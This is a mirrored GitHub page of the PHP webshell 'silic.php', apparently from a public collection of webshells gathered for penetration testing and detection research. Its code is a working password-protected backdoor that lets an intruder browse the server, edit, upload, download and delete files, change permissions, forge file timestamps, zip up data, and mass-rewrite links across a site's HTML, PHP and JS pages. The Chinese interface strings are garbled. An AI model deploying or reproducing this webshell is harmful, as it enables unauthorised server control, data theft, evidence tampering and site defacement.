Mirrors/webshell
2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2024-11-10 05:44:11 +00:00
Code Issues Projects Releases Packages Wiki Activity
webshell/php/silic.php

2211 lines
135 KiB
PHP
Raw Normal View History

update webshell Penetration testing2013 beta
2013-05-24 00:23:49 +00:00
<?php
error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
set_time_limit(0);
function Root_GP(&$array)
{
while(list($key,$var) = each($array))
{
if((strtoupper($key) != $key || ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv')
{
if(is_string($var)) $array[$key] = stripslashes($var);
if(is_array($var)) $array[$key] = Root_GP($var);
}
}
return $array;
}
$salt = "silic1234";
$psw = trim($_POST['silicpass']);
$password="8f841a9b44b0167db6056389e0106af4";
$passt = $salt.$psw;
$passt = md5(md5(md5($passt)));
$asse='asert';
function Root_CSS()
{
print<<<END
<style type="text/css">
*{padding:0; margin:0;}
body{background:threedface;font-family:"Verdana","Tahoma","<EFBFBD><EFBFBD><EFBFBD><EFBFBD>",sans-serif;font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;}
a{color:#000000;text-decoration:none;}
a:hover{background:#BBBBBB;}
table{color:#000000;font-family:"Verdana","Tahoma","<22><><EFBFBD><EFBFBD>",sans-serif;font-size:13px;border:1px solid #999999;}
td{background:#F9F6F4;}
.toptd{background:threedface;width:310px;border-color:#FFFFFF #999999 #999999 #FFFFFF;border-style:solid;border-width:1px;}
.msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;}
.actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
.footer{padding-top:3px;text-align: center;font-size:12px;font-weight: bold;height:22px;width:950px;color:#000000;background: #888888;}
</style>\n
END;
return false;
}
//<2F>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
class packdir
{
var $out='';
var $datasec=array();
var $ctrl_dir=array();
var $eof_ctrl_dir="\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset=0;
function packdir($array)
{
if(@function_exists('gzcompress'))
{
for($n = 0;$n < count($array);$n++)
{
$array[$n] = urldecode($array[$n]);
$fp = @fopen($array[$n], 'r');
$filecode = @fread($fp, @filesize($array[$n]));
@fclose($fp);
$this -> filezip($filecode,basename($array[$n]));
}
@closedir($zhizhen);
$this->out = $this->packfile();
return true;
}
return false;
}
function at($atunix = 0)
{
$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
if ($unixarr['year'] < 1980)
{
$unixarr['year'] = 1980;
$unixarr['mon'] = 1;
$unixarr['mday'] = 1;
$unixarr['hours'] = 0;
$unixarr['minutes'] = 0;
$unixarr['seconds'] = 0;
}
return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) | ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1);
}
function filezip($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->at($time));
$hexdtime = '\x'.$dtime[6].$dtime[7].'\x'.$dtime[4].$dtime[5].'\x'.$dtime[2].$dtime[3].'\x'.$dtime[0].$dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode('', $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function packfile()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00";
}
}
function File_Str($string)
{
return str_replace('//','/',str_replace('\\','/',$string));
}
function File_Size($size)
{
if($size > 1073741824) $size = round($size / 1073741824 * 100) / 100 . ' G';
elseif($size > 1048576) $size = round($size / 1048576 * 100) / 100 . ' M';
elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . ' K';
else $size = $size . ' B';
return $size;
}
function File_Mode()
{
$RealPath = realpath('./');
$SelfPath = $_SERVER['PHP_SELF'];
$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}
function File_Read($filename)
{
$handle = @fopen($filename,"rb");
$filecode = @fread($handle,@filesize($filename));
@fclose($handle);
return $filecode;
}
function File_Write($filename,$filecode,$filemode)
{
$key = true;
$handle = @fopen($filename,$filemode);
if(!@fwrite($handle,$filecode))
{
@chmod($filename,0666);
$key = @fwrite($handle,$filecode) ? true : false;
}
@fclose($handle);
return $key;
}
function File_Up($filea,$fileb)
{
$key = @copy($filea,$fileb) ? true : false;
if(!$key) $key = @move_uploaded_file($filea,$fileb) ? true : false;
return $key;
}
function File_Down($filename)
{
if(!file_exists($filename)) return false;
$filedown = basename($filename);
$array = explode('.', $filedown);
$arrayend = array_pop($array);
header('Content-type: application/x-'.$arrayend);
header('Content-Disposition: attachment; filename='.$filedown);
header('Content-Length: '.filesize($filename));
@readfile($filename);
exit;
}
function File_Deltree($deldir)
{
if(($mydir = @opendir($deldir)) == NULL) return false;
while(false !== ($file = @readdir($mydir)))
{
$name = File_Str($deldir.'/'.$file);
if((is_dir($name)) && ($file!='.') && ($file!='..')){@chmod($name,0777);File_Deltree($name);}
if(is_file($name)){@chmod($name,0777);@unlink($name);}
}
@closedir($mydir);
@chmod($deldir,0777);
return @rmdir($deldir) ? true : false;
}
function File_Act($array,$actall,$inver)
{
if(($count = count($array)) == 0) return '<27><>ѡ<EFBFBD><D1A1><EFBFBD>ļ<EFBFBD>';
if($actall == 'e')
{
$zip = new packdir;
if($zip->packdir($array)){$spider = $zip->out;header("Content-type: application/unknown");header("Accept-Ranges: bytes");header("Content-length: ".strlen($spider));header("Content-disposition: attachment; filename=".$inver.";");echo $spider;exit;}
return '<27><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>ʧ<EFBFBD><CAA7>';
}
$i = 0;
while($i < $count)
{
$array[$i] = urldecode($array[$i]);
switch($actall)
{
case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return <><C2B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '<27><><EFBFBD>Ƶ<EFBFBD>'.$inver.'Ŀ¼'; break;
case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = <><C9BE>'; break;
case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '<27><><EFBFBD><EFBFBD>ֵ<EFBFBD><D6B5><EFBFBD><EFBFBD>'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '<27><><EFBFBD><EFBFBD><EFBFBD>޸<EFBFBD>Ϊ'.$inver; break;
case "d" : @touch($array[$i],strtotime($inver)); $msg = '<27>޸<EFBFBD>ʱ<EFBFBD><CAB1>Ϊ'.$inver; break;
}
$i++;
}
return '<27><>ѡ<EFBFBD>ļ<EFBFBD>'.$msg.'<27><><EFBFBD><EFBFBD>';
}
function File_Edit($filepath,$filename,$dim = '')
{
$THIS_DIR = urlencode($filepath);
$THIS_FILE = File_Str($filepath.'/'.$filename);
if(file_exists($THIS_FILE)){$FILE_TIME = @date('Y-m-d H:i:s',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));}
else {$FILE_TIME = @date('Y-m-d H:i:s',time());$FILE_CODE = '';}
print<<<END
<script language="javascript">
var NS4 = (document.layers);
var IE4 = (document.all);
var win = this;
var n = 0;
function search(str){
var txt, i, found;
if(str == "")return false;
if(NS4){
if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
if(n == 0) alert(str + " ... Not-Find")
}
if(IE4){
txt = win.document.body.createTextRange();
for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
txt.moveStart("character", 1);
txt.moveEnd("textedit")
}
if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
}
return false
}
function CheckDate(){
var re = document.getElementById('mtime').value;
var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/;
var r = re.match(reg);
if(r==null){alert('<27><><EFBFBD>ڸ<EFBFBD>ʽ<EFBFBD><CABD><EFBFBD><EFBFBD>ȷ!<21><>ʽ:yyyy-mm-dd hh:mm:ss');return false;}
else{document.getElementById('editor').submit();}
}
</script>
<div class="actall"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
<input type="button" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD>" onclick="search(searchs.value)"></div>
<form method="POST" id="editor" action="?s=a&p={$THIS_DIR}">
<div class="actall"><input type="text" name="pfn" value="{$THIS_FILE}" style="width:750px;"></div>
<div class="actall"><textarea name="pfc" id style="width:750px;height:380px;">{$FILE_CODE}</textarea></div>
<div class="actall"><EFBFBD>ļ<EFBFBD><EFBFBD>޸<EFBFBD>ʱ<EFBFBD><EFBFBD> <input type="text" name="mtime" id="mtime" value="{$FILE_TIME}" style="width:150px;"></div>
<div class="actall"><input type="button" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD>" onclick="CheckDate();" style="width:80px;">
<input type="button" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD>" onclick="window.location='?s=a&p={$THIS_DIR}';" style="width:80px;"></div>
</form>
END;
}
function File_Soup($p)
{
$THIS_DIR = urlencode($p);
$UP_SIZE = get_cfg_var('upload_max_filesize');
$MSG_BOX = '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С:'.$UP_SIZE.', <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʽ(new.php),<2C><>Ϊ<EFBFBD><CEAA>,<2C>򱣳<EFBFBD>ԭ<EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>.';
if(!empty($_POST['updir']))
{
if(count($_FILES['soup']) >= 1)
{
$i = 0;
foreach ($_FILES['soup']['error'] as $key => $error)
{
if ($error == UPLOAD_ERR_OK)
{
$souptmp = $_FILES['soup']['tmp_name'][$key];
if(!empty($_POST['reup'][$i]))$soupname = $_POST['reup'][$i]; else $soupname = $_FILES['soup']['name'][$key];
$MSG[$i] = File_Up($souptmp,File_Str($_POST['updir'].'/'.$soupname)) ? $soupname.'<27>ϴ<EFBFBD><CFB4>ɹ<EFBFBD>' : $soupname.'<27>ϴ<EFBFBD>ʧ<EFBFBD><CAA7>';
}
$i++;
}
}
else
{
$MSG_BOX = '<27><>ѡ<EFBFBD><D1A1><EFBFBD>ļ<EFBFBD>';
}
}
print<<<END
<div class="msgbox">{$MSG_BOX}</div>
<form method="POST" id="editor" action="?s=q&p={$THIS_DIR}" enctype="multipart/form-data">
<div class="actall"><EFBFBD>ϴ<EFBFBD><EFBFBD><EFBFBD>Ŀ¼: <input type="text" name="updir" value="{$p}" style="width:531px;height:22px;"></div>
<div class="actall"><EFBFBD><EFBFBD><EFBFBD><EFBFBD>1 <input type="file" name="soup[]" style="width:300px;height:22px;"> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[0] </div>
<div class="actall"><EFBFBD><EFBFBD><EFBFBD><EFBFBD>2 <input type="file" name="soup[]" style="width:300px;height:22px;"> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[1] </div>
<div class="actall"><EFBFBD><EFBFBD><EFBFBD><EFBFBD>3 <input type="file" name="soup[]" style="width:300px;height:22px;"> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[2] </div>
<div class="actall"><EFBFBD><EFBFBD><EFBFBD><EFBFBD>4 <input type="file" name="soup[]" style="width:300px;height:22px;"> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[3] </div>
<div class="actall"><EFBFBD><EFBFBD><EFBFBD><EFBFBD>5 <input type="file" name="soup[]" style="width:300px;height:22px;"> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[4] </div>
<div class="actall"><EFBFBD><EFBFBD><EFBFBD><EFBFBD>6 <input type="file" name="soup[]" style="width:300px;height:22px;"> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[5] </div>
<div class="actall"><EFBFBD><EFBFBD><EFBFBD><EFBFBD>7 <input type="file" name="soup[]" style="width:300px;height:22px;"> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[6] </div>
<div class="actall"><EFBFBD><EFBFBD><EFBFBD><EFBFBD>8 <input type="file" name="soup[]" style="width:300px;height:22px;"> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[7] </div>
<div class="actall"><input type="submit" value="<EFBFBD>ϴ<EFBFBD>" style="width:80px;"> <input type="button" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD>" onclick="window.location='?s=a&p={$THIS_DIR}';" style="width:80px;"></div>
</form>
END;
}
function File_a($p)
{
if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
$MSG_BOX = '<27>ȴ<EFBFBD><C8B4><EFBFBD>Ϣ<EFBFBD><CFA2><EFBFBD><EFBFBD>';
$UP_DIR = urlencode(File_Str($p.'/..'));
$REAL_DIR = File_Str(realpath($p));
$FILE_DIR = File_Str(dirname(__FILE__));
$ROOT_DIR = File_Mode();
$THIS_DIR = urlencode(File_Str($REAL_DIR));
$NUM_D = 0;
$NUM_F = 0;
if(!empty($_POST['pfn'])){$intime = @strtotime($_POST['mtime']);$MSG_BOX = File_Write($_POST['pfn'],$_POST['pfc'],'wb') ? '<27><EFBFBD>ļ<EFBFBD> '.$_POST['pfn'].' <20>ɹ<EFBFBD>' : '<27><EFBFBD>ļ<EFBFBD> '.$_POST['pfn'].' ʧ<><CAA7>';@touch($_POST['pfn'],$intime);}
if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST['ufn']; else $upfilename = $_FILES['ufp']['name'];$MSG_BOX = File_Up($_FILES['ufp']['tmp_name'],File_Str($REAL_DIR.'/'.$upfilename)) ? '<27>ϴ<EFBFBD><CFB4>ļ<EFBFBD> '.$upfilename.' <20>ɹ<EFBFBD>' : '<27>ϴ<EFBFBD><CFB4>ļ<EFBFBD> '.$upfilename.' ʧ<><CAA7>';}
if(!empty($_POST['actall'])){$MSG_BOX = File_Act($_POST['files'],$_POST['actall'],$_POST['inver']);}
if(isset($_GET['md'])){$modfile = File_Str($REAL_DIR.'/'.$_GET['mk']); if(!eregi("^[0-7]{4}$",$_GET['md'])) $MSG_BOX = '<27><><EFBFBD><EFBFBD>ֵ<EFBFBD><D6B5><EFBFBD><EFBFBD>'; else $MSG_BOX = @chmod($modfile,base_convert($_GET['md'],8,10)) ? '<27>޸<EFBFBD> '.$modfile.' <20><><EFBFBD><EFBFBD>Ϊ '.$_GET['md'].' <20>ɹ<EFBFBD>' : '<27>޸<EFBFBD> '.$modfile.' <20><><EFBFBD><EFBFBD>Ϊ '.$_GET['md'].' ʧ<><CAA7>';}
if(isset($_GET['mn'])){$MSG_BOX = @rename(File_Str($REAL_DIR.'/'.$_GET['mn']),File_Str($REAL_DIR.'/'.$_GET['rn'])) ? '<27><><EFBFBD><EFBFBD> '.$_GET['mn'].' Ϊ '.$_GET['rn'].' <20>ɹ<EFBFBD>' : '<27><><EFBFBD><EFBFBD> '.$_GET['mn'].' Ϊ '.$_GET['rn'].' ʧ<><CAA7>';}
if(isset($_GET['dn'])){$MSG_BOX = @mkdir(File_Str($REAL_DIR.'/'.$_GET['dn']),0777) ? '<27><><EFBFBD><EFBFBD>Ŀ¼ '.$_GET['dn'].' <20>ɹ<EFBFBD>' : '<27><><EFBFBD><EFBFBD>Ŀ¼ '.$_GET['dn'].' ʧ<><CAA7>';}
if(isset($_GET['dd'])){$MSG_BOX = File_Deltree($_GET['dd']) ? <><C9BE>Ŀ¼ '.$_GET['dd'].' <20>ɹ<EFBFBD>' : <><C9BE>Ŀ¼ '.$_GET['dd'].' ʧ<><CAA7>';}
if(isset($_GET['df'])){if(!File_Down($_GET['df'])) $MSG_BOX = '<27><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>';}
Root_CSS();
print<<<END
<script type="text/javascript">
function Inputok(msg,gourl)
{
smsg = "<EFBFBD><EFBFBD>ǰ<EFBFBD>ļ<EFBFBD>:[" + msg + "]";
re = prompt(smsg,unescape(msg));
if(re)
{
var url = gourl + escape(re);
window.location = url;
}
}
function Delok(msg,gourl)
{
smsg = "ȷ<EFBFBD><EFBFBD>Ҫɾ<EFBFBD><EFBFBD>[" + unescape(msg) + "]<5D><>?";
if(confirm(smsg))
{
if(gourl == 'b')
{
document.getElementById('actall').value = escape(gourl);
document.getElementById('fileall').submit();
}
else window.location = gourl;
}
}
function CheckDate(msg,gourl)
{
smsg = "<EFBFBD><EFBFBD>ǰ<EFBFBD>ļ<EFBFBD>ʱ<EFBFBD><EFBFBD>:[" + msg + "]";
re = prompt(smsg,msg);
if(re)
{
var url = gourl + re;
var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/;
var r = re.match(reg);
if(r==null){alert('<27><><EFBFBD>ڸ<EFBFBD>ʽ<EFBFBD><CABD><EFBFBD><EFBFBD>ȷ!<21><>ʽ:yyyy-mm-dd hh:mm:ss');return false;}
else{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();}
}
}
function CheckAll(form)
{
for(var i=0;i<form.elements.length;i++)
{
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
}
function SubmitUrl(msg,txt,actid)
{
re = prompt(msg,unescape(txt));
if(re)
{
document.getElementById('actall').value = actid;
document.getElementById('inver').value = escape(re);
document.getElementById('fileall').submit();
}
}
</script>
<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
<div class="actall" style="text-align:center;padding:3px;">
<form method="GET"><input type="hidden" id="s" name="s" value="a">
<input type="text" name="p" value="{$REAL_DIR}" style="width:550px;height:22px;">
<select onchange="location.href='?s=a&p='+options[selectedIndex].value">
<option>---<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼---</option>
<option value="{$ROOT_DIR}"><EFBFBD><EFBFBD>վ<EFBFBD><EFBFBD>Ŀ¼</option>
<option value="{$FILE_DIR}"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼</option>
<option value="C:/">C<EFBFBD><EFBFBD></option>
<option value="D:/">D<EFBFBD><EFBFBD></option>
<option value="E:/">E<EFBFBD><EFBFBD></option>
<option value="F:/">F<EFBFBD><EFBFBD></option>
<option value="C:/Documents and Settings/All Users/<2F><><EFBFBD><EFBFBD>ʼ<EFBFBD><CABC><EFBFBD>˵<EFBFBD>/<2F><><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD>"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(Ӣ)</option>
<option value="C:/RECYCLER"><EFBFBD><EFBFBD><EFBFBD><EFBFBD>վ</option>
<option value="C:/Program Files">Programs</option>
<option value="/etc">etc</option>
<option value="/home">home</option>
<option value="/usr/local">Local</option>
<option value="/tmp">Temp</option>
</select><input type="submit" value="ת<EFBFBD><EFBFBD>" style="width:50px;"></form>
<div style="margin-top:3px;"></div>
<form method="POST" action="?s=a&p={$THIS_DIR}" enctype="multipart/form-data">
<input type="button" value="<EFBFBD>½<EFBFBD><EFBFBD>ļ<EFBFBD>" onclick="Inputok('newfile.php','?s=p&fp={$THIS_DIR}&fn=');">
<input type="button" value="<EFBFBD>½<EFBFBD>Ŀ¼" onclick="Inputok('newdir','?s=a&p={$THIS_DIR}&dn=');">
<input type="button" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϴ<EFBFBD>" onclick="window.location='?s=q&p={$REAL_DIR}';">
<input type="file" name="ufp" style="width:300px;height:22px;">
<input type="text" name="ufn" style="width:121px;height:22px;">
<input type="submit" value="<EFBFBD>ϴ<EFBFBD>" style="width:50px;">
</form></div>
<form method="POST" name="fileall" id="fileall" action="?s=a&p={$THIS_DIR}">
<table border="0"><tr><td class="toptd" style="width:450px;"> <a href="?s=a&p={$UP_DIR}"><b><EFBFBD>ϼ<EFBFBD>Ŀ¼</b></a></td>
<td class="toptd" style="width:80px;"> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> </td><td class="toptd" style="width:48px;"> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> </td><td class="toptd" style="width:173px;"> <EFBFBD>޸<EFBFBD>ʱ<EFBFBD><EFBFBD> </td><td class="toptd" style="width:75px;"> <EFBFBD><EFBFBD>С </td></tr>
END;
if(($h_d = @opendir($p)) == NULL) return false;
while(false !== ($Filename = @readdir($h_d)))
{
if($Filename == '.' or $Filename == '..') continue;
$Filepath = File_Str($REAL_DIR.'/'.$Filename);
if(is_dir($Filepath))
{
$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
$Filepath = urlencode($Filepath);
echo "\r\n".' <tr><td> <a href="?s=a&p='.$Filepath.'"><font face="wingdings" size="3">0</font><b> '.$Filename.' </b></a> </td> ';
$Filename = urlencode($Filename);
echo ' <td> <a href="#" onclick="Delok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&dd='.$Filename.'\');return false;"> ɾ<><C9BE> </a> ';
echo ' <a href="#" onclick="Inputok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&mn='.$Filename.'&rn=\');return false;"> <20><><EFBFBD><EFBFBD> </a> </td> ';
echo ' <td> <a href="#" onclick="Inputok(\''.$Fileperm.'\',\'?s=a&p='.$THIS_DIR.'&mk='.$Filename.'&md=\');return false;"> '.$Fileperm.' </a> </td> ';
echo ' <td>'.$Filetime.'</td> ';
echo ' <td> </td> </tr>'."\r\n";
$NUM_D++;
}
}
@rewinddir($h_d);
while(false !== ($Filename = @readdir($h_d)))
{
if($Filename == '.' or $Filename == '..') continue;
$Filepath = File_Str($REAL_DIR.'/'.$Filename);
if(!is_dir($Filepath))
{
$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$Filepath);
$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
$Filesize = File_Size(@filesize($Filepath));
if($Filepath == File_Str(__FILE__)) $fname = '<font color="#8B0000">'.$Filename.'</font>'; else $fname = $Filename;
echo "\r\n".' <tr><td> <input type="checkbox" name="files[]" value="'.urlencode($Filepath).'"><a target="_blank" href="'.$Fileurls.'">'.$fname.'</a> </td>';
$Filepath = urlencode($Filepath);
$Filename = urlencode($Filename);
echo ' <td> <a href="?s=p&fp='.$THIS_DIR.'&fn='.$Filename.'"> <20>༭ </a> ';
echo ' <a href="#" onclick="Inputok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&mn='.$Filename.'&rn=\');return false;"> <20><><EFBFBD><EFBFBD> </a> </td>';
echo ' <td>'.$Fileperm.'</td> ';
echo ' <td>'.$Filetime.'</td> ';
echo ' <td align="right"> <a href="?s=a&df='.$Filepath.'">'.$Filesize.'</a> </td></tr> '."\r\n";
$NUM_F++;
}
}
@closedir($h_d);
if(!$Filetime) $Filetime = '2009-01-01 00:00:00';
print<<<END
</table>
<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined">
<input type="hidden" id="inver" name="inver" value="undefined">
<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);">
<input type="button" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD>" onclick="SubmitUrl('<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ѡ<EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>·<EFBFBD><C2B7>: ','{$THIS_DIR}','a');return false;">
<input type="button" value="ɾ<EFBFBD><EFBFBD>" onclick="Delok('<27><>ѡ<EFBFBD>ļ<EFBFBD>','b');return false;">
<input type="button" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD>" onclick="SubmitUrl('<27>޸<EFBFBD><DEB8><EFBFBD>ѡ<EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>ֵΪ: ','0666','c');return false;">
<input type="button" value="ʱ<EFBFBD><EFBFBD>" onclick="CheckDate('{$Filetime}','d');return false;">
<input type="button" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD>" onclick="SubmitUrl('<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ѡ<EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ: ','silic.gz','e');return false;">
Ŀ¼({$NUM_D}) / <EFBFBD>ļ<EFBFBD>({$NUM_F})</div> </form>
END;
return true;
}
//<2F><><EFBFBD><EFBFBD><EFBFBD>
function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb)
{
if(($h_d = @opendir($tp)) == NULL) return false;
while(false !== ($Filename = @readdir($h_d)))
{
if($Filename == '.' || $Filename == '..') continue;
$Filepath = File_Str($tp.'/'.$Filename);
if(is_dir($Filepath) && $tb) Tihuan_Auto($Filepath,$tt,$th,$tca,$tcb,$td,$tb);
$doing = false;
if(eregi($tt,$Filename))
{
$ic = File_Read($Filepath);
if($th)
{
if(!stristr($ic,$tca)) continue;
$ic = str_replace($tca,$tcb,$ic);
$doing = true;
}
else
{
preg_match_all("/href\=\"([^~]*?)\"/i",$ic,$nc);
for($i = 0;$i < count($nc[1]);$i++){if(eregi($tca,$nc[1][$i])){$ic = str_replace($nc[1][$i],$tcb,$ic);$doing = true;}}
}
if($td) $ftime = @filemtime($Filepath);
if($doing) echo File_Write($Filepath,$ic,'wb') ? '<font color="#006600"><3E>ɹ<EFBFBD>:</font>'.$Filepath.' <br>'."\r\n" : '<font color="#FF0000">ʧ<><CAA7>:</font>'.$Filepath.' <br>'."\r\n";
if($td) @touch($Filepath,$ftime);
ob_flush();
flush();
}
}
@closedir($h_d);
return true;
}
function Tihuan_d()
{
if((!empty($_POST['tp'])) && (!empty($_POST['tt'])))
{
echo '<div class="actall">';
$tt = str_replace('.','\\.',$_POST['tt']);
$td = isset($_POST['td']) ? true : false;
$tb = ($_POST['tb'] == 'a') ? true : false;
$th = ($_POST['th'] == 'a') ? true : false;
if($th) $_POST['tca'] = str_replace('.','\\.',$_POST['tca']);
echo Tihuan_Auto($_POST['tp'],$tt,$th,$_POST['tca'],$_POST['tcb'],$td,$tb) ? '<a href="#" onclick="window.location=\'?s=d\'"><3E><EFBFBD><E6BBBB><EFBFBD><EFBFBD></a>' : '<a href="#" onclick="window.location=\'?s=d\'"><3E><EFBFBD><ECB3A3>ֹ</a>';
echo '</div>';
return false;
}
$FILE_DIR = File_Str(dirname(__FILE__));
$ROOT_DIR = File_Mode();
print<<<END
<script language="javascript">
function Fulllll(i){
if(i==0) return false;
Str = new Array(5);
if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";tform.tp.value = Str[i];}
else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";tform.tt.value = Str[i];}
return true;
}
